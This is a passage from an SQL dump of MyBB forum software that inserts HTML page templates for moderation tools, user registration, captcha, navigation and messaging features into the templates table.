align=\"center\">{$lang->msn_address_is}<br />{$user[\'msn\']}</td> </tr> </table> </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('412', 'misc_imcenter_yahoo', '<html> <head> <title>{$lang->yahoo_center}</title> {$headerinclude} </head> <body style=\"margin:0;left:0;top:0\" class=\"trow2\"> <table width=\"100%\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" border=\"0\" align=\"center\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\"><strong>{$user[\'username\']} - {$lang->yahoo_center}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$navigationbar}</strong></span></td> </tr> <tr> <td class=\"trow1\" align=\"center\" colspan=\"2\"><strong>{$user[\'yahoo\']}</strong></td> </tr> <tr> <td class=\"trow1\" align=\"center\" colspan=\"2\"><strong><img src=\"http://opi.yahoo.com/online?u={$user[\'yahoo\']}&amp;m=g&amp;t=2\" /></strong></td> </tr> <tr> <td class=\"trow1\" align=\"center\" colspan=\"2\"><span class=\"smalltext\"><a href=\"http://edit.yahoo.com/config/send_webmesg?.target={$user[\'yahoo\']}&amp;.src=pg\">{$lang->send_y_message}</a></span></td> </tr><tr> <td class=\"trow1\" align=\"center\" colspan=\"2\"><span class=\"smalltext\"><a href=\"http://members.yahoo.com/interests?.oc=t&amp;.kw={$user[\'yahoo\']}&amp;.sb=1\">{$lang->view_y_profile}</a></td> </tr> </table> </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('413', 'usercp_editsig_current', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->current_sig}</strong></td> </tr> <tr> <td class=\"trow1\">{$sigpreview}</td> </tr> </table> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('414', 'usercp_editsig_preview', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->sig_preview}</strong></td> </tr> <tr> <td class=\"trow1\">{$sigpreview}</td> </tr> </table> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('415', 'member_resendactivation', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->resend_activation}</title> {$headerinclude} </head> <body> {$header} <form action=\"member.php\" method=\"post\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->resend_activation}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"40%\"><strong>{$lang->email_address}</strong></td> <td class=\"trow1\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"email\" /></td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->request_activation}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_resendactivation\" /> </form> {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('416', 'nav', ' <div class=\"navigation\"> {$nav}{$activesep}{$activebit} </div>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('417', 'nav_bit', '<a href=\"{$navbit[\'url\']}\">{$navbit[\'name\']}</a>{$sep}', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('418', 'nav_bit_active', '<span class=\"active\">{$navbit[\'name\']}</span>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('419', 'moderation_inline_deletethreads', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->delete_threads}</title> {$headerinclude} </head> <body> {$header} <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->delete_threads}</strong></td> </tr> <tr> <td class=\"trow1\" colspan=\"2\" align=\"center\">{$lang->confirm_delete_threads}</td> </tr> {$loginbox} </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_threads}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_multideletethreads\" /> <input type=\"hidden\" name=\"fid\" value=\"{$fid}\" /> <input type=\"hidden\" name=\"threads\" value=\"{$inlineids}\" /> <input type=\"hidden\" name=\"url\" value=\"{$return_url}\" /> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('420', 'postbit_inlinecheck', '| <input type=\"checkbox\" class=\"checkbox\" name=\"inlinemod_{$post[\'pid\']}\" id=\"inlinemod_{$post[\'pid\']}\" value=\"1\" style=\"vertical-align: middle;\" {$inlinecheck} />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('421', 'moderation_inline_movethreads', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->move_threads}</title> {$headerinclude} </head> <body> {$header} <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->move_threads}</strong></td> </tr> {$loginbox} <tr> <td class=\"trow1\"><strong>{$lang->new_forum}</strong></td> <td class=\"trow2\">{$forumselect}</td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->move_threads}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_multimovethreads\" /> <input type=\"hidden\" name=\"fid\" value=\"{$fid}\" /> <input type=\"hidden\" name=\"threads\" value=\"{$inlineids}\" /> <input type=\"hidden\" name=\"url\" value=\"{$return_url}\" /> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('422', 'moderation_inline_mergeposts', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->merge_posts}</title> {$headerinclude} </head> <body> {$header} <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->merge_posts}</strong></td> </tr> <tr> {$loginbox} <tr> <td class=\"trow2\"><strong>{$lang->post_separator}</strong></td> <td class=\"trow2\"><label><input type=\"radio\" class=\"radio\" name=\"sep\" value=\"hr\" checked=\"checked\" />&nbsp;{$lang->horizontal_rule}</label><br /><label><input type=\"radio\" class=\"radio\" name=\"sep\" value=\"new_line\" />&nbsp;{$lang->new_line}</label></td> </tr> {$postlist} </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->merge_posts}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_multimergeposts\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> <input type=\"hidden\" name=\"url\" value=\"{$return_url}\" /> </form> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('423', 'moderation_inline_splitposts', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->split_thread}</title> {$headerinclude} </head> <body> {$header} <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->split_thread}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->new_thread_info}</strong></span></td> </tr> {$loginbox} <tr> <td class=\"trow2\"><strong>{$lang->new_subject}</strong></td> <td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"newsubject\" value=\"{$lang->split_thread_subject} {$thread[\'subject\']}\" size=\"50\" /></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->new_forum}</strong></td> <td class=\"trow1\">{$forumselect}</td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->split_thread}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_multisplitposts\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> <input type=\"hidden\" name=\"posts\" value=\"{$inlineids}\" /> <input type=\"hidden\" name=\"url\" value=\"{$return_url}\" /> </form> {$footer} </body> </html>', '-2', '1607', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('424', 'moderation_delayedmoderation_move', '<br /> {$lang->method}:<br /> <label><input type=\"radio\" class=\"radio\" name=\"delayedmoderation[method]\" value=\"move\" {$method_selected[\'move\']} />{$lang->method_move}</label><br /> <label><input type=\"radio\" class=\"radio\" name=\"delayedmoderation[method]\" value=\"redirect\" {$method_selected[\'redirect\']} />{$lang->method_move_redirect}</label> <input type=\"text\" class=\"textbox\" name=\"delayedmoderation[redirect_expire]\" value=\"{$mybb->input[\'redirect_expire\']}\" size=\"3\" /> {$lang->redirect_expire_note}<br /> <label><input type=\"radio\" class=\"radio\" name=\"delayedmoderation[method]\" value=\"copy\" {$method_selected[\'copy\']} />{$lang->method_copy}</label><br />', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('425', 'moderation_delayedmoderation_merge', '<dt><input type=\"radio\" name=\"type\" value=\"merge\" {$type_selected[\'merge\']} id=\"type_merge\" onclick=\"toggleType();\" /> <label for=\"type_merge\"><strong>{$lang->merge_threads}</strong></label></dt> <dd style=\"margin-top: 4px; width: 100%;\" id=\"type_merge_expanded\"> {$lang->new_subject}<br /> <input type=\"text\" class=\"textbox\" name=\"delayedmoderation[subject]\" value=\"{$mybb->input[\'delayedmoderation\'][\'subject\']}\" size=\"40\" /><br /> {$lang->thread_to_merge_with}<br /> <input type=\"text\" class=\"textbox\" name=\"delayedmoderation[threadurl]\" value=\"{$mybb->input[\'delayedmoderation\'][\'threadurl\']}\" size=\"40\" /> <br /><span class=\"smalltext\">{$lang->merge_with_note}</span> </dd>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('426', 'moderation_delayedmodaction_notes', '<tr> <td class=\"{$trow}\" align=\"center\">{$delayedmod[\'profilelink\']}</td> <td class=\"{$trow}\" align=\"center\">{$delayedmod[\'dateline\']}</td> <td class=\"{$trow}\" align=\"center\">{$delayedmod[\'action\']}</td> <td class=\"{$trow}\">{$info}</td> <td class=\"{$trow}\" align=\"center\"><a href=\"moderation.php?action=cancel_delayedmoderation&amp;tid={$tid}&amp;fid={$fid}&amp;did={$delayedmod[\'did\']}&amp;my_post_key={$mybb->post_code}\">{$lang->cancel}</a></td> </tr> ', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('427', 'moderation_delayedmoderation', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->delayed_moderation}</title> {$headerinclude} </head> <body> {$header} {$display_errors} <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"5\"><strong>{$lang->delayed_mod_queue}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\"><strong>{$lang->mod_username}</strong></td> <td class=\"tcat\" align=\"center\"><strong>{$lang->days_to_perform_action}</strong></td> <td class=\"tcat\" align=\"center\"><strong>{$lang->mod_actions}</strong></td> <td class=\"tcat\" align=\"center\"><strong>{$lang->mod_information}</strong></td> <td class=\"tcat\" align=\"center\"><strong>{$lang->actions}</strong></td> </tr> {$delayedmods} </table> <br /> <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_delayedmoderation\" /> <input type=\"hidden\" name=\"url\" value=\"{$url}\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> <input type=\"hidden\" name=\"fid\" value=\"{$fid}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->delayed_moderation}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->delayed_moderation_desc}</strong></td> </tr> {$loginbox} <tr> <td class=\"trow1\"><strong>{$lang->threads}</strong></td> <td class=\"trow2\">{$threads}</td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->delay_moderation_for}</strong></td> <td class=\"trow2\"><input type=\"text\" class=\"textbox\" size=\"5\" name=\"delay\" maxlength=\"10\" value=\"{$mybb->input[\'delay\']}\"/> {$lang->days}</td> </tr> <tr> <td class=\"trow1\" style=\"vertical-align: top;\"><strong>{$lang->moderation_action}</strong></td> <td class=\"trow2\"> <script type=\"text/javascript\"> <!-- function toggleType() { if($(\'type_merge\')) { if($(\'type_movecopythread\').checked == true) { Element.hide(\'type_merge_expanded\'); Element.show(\'type_movecopythread_expanded\'); } else if($(\'type_merge\').checked == true) { Element.hide(\'type_movecopythread_expanded\'); Element.show(\'type_merge_expanded\'); } else { Element.hide(\'type_movecopythread_expanded\'); Element.hide(\'type_merge_expanded\'); } } else { if($(\'type_movecopythread\').checked == true) { Element.show(\'type_movecopythread_expanded\'); } else { Element.hide(\'type_movecopythread_expanded\'); } } } // --> </script> <dl style=\"margin-top: 0; margin-bottom: 0; width: 100%;\"> <dt><input type=\"radio\" name=\"type\" value=\"openclosethread\" {$type_selected[\'openclosethread\']} id=\"type_openclosethread\" onclick=\"toggleType();\" /> <label for=\"type_openclosethread\"><strong>{$lang->open_close_thread}</strong></label></dt> <dt><input type=\"radio\" name=\"type\" value=\"deletethread\" {$type_selected[\'deletethread\']} id=\"type_deletethread\" onclick=\"toggleType();\" /> <label for=\"type_deletethread\"><strong>{$lang->delete_thread}</strong></label></dt> <dt><input type=\"radio\" name=\"type\" value=\"move\" {$type_selected[\'movecopythread\']} id=\"type_movecopythread\" onclick=\"toggleType();\" /> <label for=\"type_movecopythread\"><strong>{$lang->move_copy_thread}</strong></label></dt> <dd style=\"margin-top: 4px;\" id=\"type_movecopythread_expanded\"> {$lang->new_forum}<br /> {$forumselect} {$moderation_delayedmoderation_move} </dd> <dt><input type=\"radio\" name=\"type\" value=\"stick\" {$type_selected[\'stick_unstick_thread\']} id=\"type_stick_unstick_thread\" onclick=\"toggleType();\" /> <label for=\"type_stick_unstick_thread\"><strong>{$lang->stick_unstick_thread}</strong></label></dt> {$moderation_delayedmoderation_merge} <dt><input type=\"radio\" name=\"type\" value=\"removeredirects\" {$type_selected[\'removeredirects\']} id=\"type_removeredirects\" onclick=\"toggleType();\" /> <label for=\"type_removeredirects\"><strong>{$lang->remove_redirects}</strong></label></dt> <dt><input type=\"radio\" name=\"type\" value=\"removesubscriptions\" {$type_selected[\'removesubscriptions\']} id=\"type_removesubscriptions\" onclick=\"toggleType();\" /> <label for=\"type_removesubscriptions\"><strong>{$lang->remove_subscriptions}</strong></label></dt> <dt><input type=\"radio\" name=\"type\" value=\"approveunapprovethread\" {$type_selected[\'approveunapprovethread\']} id=\"type_approveunapprovethread\" onclick=\"toggleType();\" /> <label for=\"type_approveunapprovethread\"><strong>{$lang->approve_unapprove_thread}</strong></label></dt> {$customthreadtools} </dl> <script type=\"text/javascript\"> <!-- toggleType(); // --> </script> </td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->save_delayed_moderation}\" /></div> </form> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('428', 'moderation_delayedmoderation_custommodtool', '<dt><input type=\"radio\" name=\"type\" value=\"modtool_{$tool[\'tid\']}\" {$checked} id=\"type_modtool_{$tool[\'tid\']}\" onclick=\"toggleType();\" /> <label for=\"type_modtool_{$tool[\'tid\']}\"><strong>{$tool[\'name\']}</strong> <small>({$lang->custom})</small></label></dt>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('429', 'member_register_regimage', '<br /> <fieldset class=\"trow2\"> <script type=\"text/javascript\" src=\"jscripts/captcha.js?ver=1400\"></script> <legend><strong>{$lang->image_verification}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td><span class=\"smalltext\">{$lang->verification_note}</span></td> <td rowspan=\"2\" align=\"center\"><img src=\"captcha.php?action=regimage&amp;imagehash={$imagehash}\" alt=\"{$lang->image_verification}\" title=\"{$lang->image_verification}\" id=\"captcha_img\" /><br /><span style=\"color: red;\" class=\"smalltext\">{$lang->verification_subnote}</span> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { document.write(\'<br \\/><br \\/><input type=\"button\" class=\"button\" tabindex=\"10000\" name=\"refresh\" value=\"{$lang->refresh}\" onclick=\"return captcha.refresh();\" \\/>\'); } // --> </script> </td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"imagestring\" value=\"\" id=\"imagestring\" style=\"width: 100%;\" /><input type=\"hidden\" name=\"imagehash\" value=\"{$imagehash}\" id=\"imagehash\" /></td> </tr> <tr> <td id=\"imagestring_status\" style=\"display: none;\" colspan=\"2\">&nbsp;</td> </tr> </table> </fieldset>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('430', 'member_register_regimage_recaptcha', '<br /> <script type=\"text/javascript\"> <!-- var RecaptchaOptions = { theme: \'clean\' }; // --> </script> <fieldset class=\"trow2\"> <legend><strong>{$lang->image_verification}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td><span class=\"smalltext\">{$lang->verification_note}</span></td> </tr> <tr> <td><script type=\"text/javascript\" src=\"{$server}/challenge?k={$public_key}\"></script></td> </tr> </table> </fieldset>', '-2', '1605', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('431', 'error_inline', '<div class=\"error\"> <p><em>{$title}</em></p> <ul> {$errorlist} </ul> </div> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('432', 'member_register', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->registration}</title> {$headerinclude} <script type=\"text/javascript\" src=\"jscripts/validator.js\"></script> </head> <body> {$header} <br /> <form action=\"member.php\" method=\"post\" id=\"registration_form\"><input type=\"text\" style=\"visibility: hidden;\" value=\"\" name=\"regcheck1\" /><input type=\"text\" style=\"visibility: hidden;\" value=\"true\" name=\"regcheck2\" /> {$regerrors} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->registration}</strong></td> </tr> <tr> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->account_details}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td colspan=\"2\"><span class=\"smalltext\"><label for=\"username\">{$lang->username}</label></span></td> </tr> <tr> <td colspan=\"2\"><input type=\"text\" class=\"textbox\" name=\"username\" id=\"username\" style=\"width: 100%\" value=\"{$username}\" /></td> </tr> {$passboxes} <tr> <td><span class=\"smalltext\"><label for=\"email\">{$lang->email}</label></span></td> <td><span class=\"smalltext\"><label for=\"email2\">{$lang->confirm_email}</label></span></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"email\" id=\"email\" style=\"width: 100%\" maxlength=\"50\" value=\"{$email}\" /></td> <td><input type=\"text\" class=\"textbox\" name=\"email2\" id=\"email2\" style=\"width: 100%\" maxlength=\"50\" value=\"{$email2}\" /></td> </tr> <tr> <td colspan=\"2\" style=\"display: none;\" id=\"email_status\">&nbsp;</td> </tr> {$hiddencaptcha} </table> </fieldset> {$requiredfields} {$referrer} {$regimage} </td> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->account_prefs}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"allownotices\" id=\"allownotices\" value=\"1\" {$allownoticescheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"allownotices\">{$lang->allow_notices}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"hideemail\" id=\"hideemail\" value=\"1\" {$hideemailcheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"hideemail\">{$lang->hide_email}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"receivepms\" id=\"receivepms\" value=\"1\" {$receivepmscheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"receivepms\">{$lang->receive_pms}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"pmnotice\" id=\"pmnotice\" value=\"1\"{$pmnoticecheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"pmnotice\">{$lang->pm_notice}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"emailpmnotify\" id=\"emailpmnotify\" value=\"1\" {$emailpmnotifycheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"emailpmnotify\">{$lang->email_notify_newpm}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"invisible\" id=\"invisible\" value=\"1\" {$invisiblecheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"invisible\">{$lang->invisible_mode}</label></span></td> </tr> <tr> <td colspan=\"2\"><span class=\"smalltext\"><label for=\"subscriptionmethod\">{$lang->subscription_method}</label></span></td> </tr> <tr> <td colspan=\"2\"> <select name=\"subscriptionmethod\" id=\"subscriptionmethod\"> <option value=\"0\" {$no_subscribe_selected}>{$lang->no_auto_subscribe}</option> <option value=\"1\" {$no_email_subscribe_selected}>{$lang->no_email_subscribe}</option> <option value=\"2\" {$instant_email_subscribe_selected}>{$lang->instant_email_subscribe}</option> </select> </td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong><label for=\"timezone\">{$lang->time_offset}</label></strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td><span class=\"smalltext\">{$lang->time_offset_desc}</span></td> </tr> <tr> <td>{$tzselect}</td> </tr> <tr> <td><span class=\"smalltext\">{$lang->dst_correction}</span></td> </tr> <tr> <td> <select name=\"dstcorrection\"> <option value=\"2\" {$dst_auto_selected}>{$lang->dst_correction_auto}</option> <option value=\"1\" {$dst_enabled_selected}>{$lang->dst_correction_enabled}</option> <option value=\"0\" {$dst_disabled_selected}>{$lang->dst_correction_disabled}</option> </select> </td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong><label for=\"language\">{$lang->lang_select}</label></strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td colspan=\"2\"><span class=\"smalltext\">{$lang->lang_select_desc}</span></td> </tr> <tr> <td><select name=\"language\" id=\"language\"><option value=\"\">{$lang->lang_select_default}</option><option value=\"\">-----------</option>{$langoptions}</select></td> </tr> </table> </fieldset> </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"step\" value=\"registration\" /> <input type=\"hidden\" name=\"action\" value=\"do_register\" /> <input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->submit_registration}\" /> </div> </form> <script type=\"text/javascript\"> <!-- regValidator = new FormValidator(\'registration_form\'); regValidator.register(\'username\', \'notEmpty\', {failure_message:\'{$lang->js_validator_no_username}\'}); regValidator.register(\'email\', \'regexp\', {match_field:\'email2\', regexp:\'^([a-zA-Z0-9_\\\\.\\\\+\\\\-])+\\\\@(([a-zA-Z0-9\\\\-])+\\\\.)+([a-zA-Z0-9]{2,4})+$\', failure_message:\'{$lang->js_validator_invalid_email}\'}); regValidator.register(\'email2\', \'matches\', {match_field:\'email\', status_field:\'email_status\', failure_message:\'{$lang->js_validator_email_match}\'}); {$validator_extra} regValidator.register(\'username\', \'ajax\', {url:\'xmlhttp.php?action=username_availability\', loading_message:\'{$lang->js_validator_checking_username}\'}); // needs to be last // --> </script> {$footer} </body> </html>', '-2', '1605', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('433', 'member_register_hiddencaptcha', '<tr style=\"display: none;\"> <td colspan=\"2\" id=\"{$captcha_field}_status\">{$lang->leave_this_field_empty} <input type=\"text\" class=\"textbox\" name=\"{$captcha_field}\" id=\"{$captcha_field}\" style=\"width: 100%\" maxlength=\"50\" value=\"\" /></td> </tr>', '-2', '1605', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('434', 'global_bannedwarning', '<div class=\"red_alert\"> <strong>{$lang->banned_warning}</strong> {$lang->banned_warning2}: {$reason}<br /> {$lang->banned_warning3}: {$banlift}<br /> </div> <br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('435', 'htmldoctype', '<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('436', 'postbit_multiquote', '<a href=\"javascript:Thread.multiQuote({$post[\'pid\']});\" style=\"display: none;\" id=\"multiquote_link_{$post[\'pid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_multiquote.gif\" alt=\"{$lang->postbit_multiquote}\" title=\"{$lang->postbit_multiquote}\" id=\"multiquote_{$post[\'pid\']}\" /></a> <script type=\"text/javascript\"> //<!-- $(\'multiquote_link_{$post[\'pid\']}\').style.display = \'\'; // --> </script>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('437', 'private_send_autocomplete', '<script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { new autoComplete(\"to\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\", delimChar: \",\"}); if($(\'bcc\')) { new autoComplete(\"bcc\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\", delimChar: \",\"}); } } // --> </script>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('438', 'forumdisplay_threadlist_inlineedit_js', '<script type=\"text/javascript\" src=\"jscripts/inline_edit.js?ver=1400\"></script> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { new inlineEditor(\"xmlhttp.php?action=edit_subject&my_post_key=\"+my_post_key, {className: \"subject_editable\", spinnerImage: \"{$theme[\'imgdir\']}/spinner.gif\", lang_click_edit: \"{$lang->click_hold_edit}\"}); } // --> </script>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('439', 'xmlhttp_inline_post_editor', '<br /> <div style=\"clear: both;\"> <div> <textarea style=\"width: 99%; padding: 4px; margin: 0;\" rows=\"12\" cols=\"80\" id=\"quickedit_{$post[\'pid\']}\" 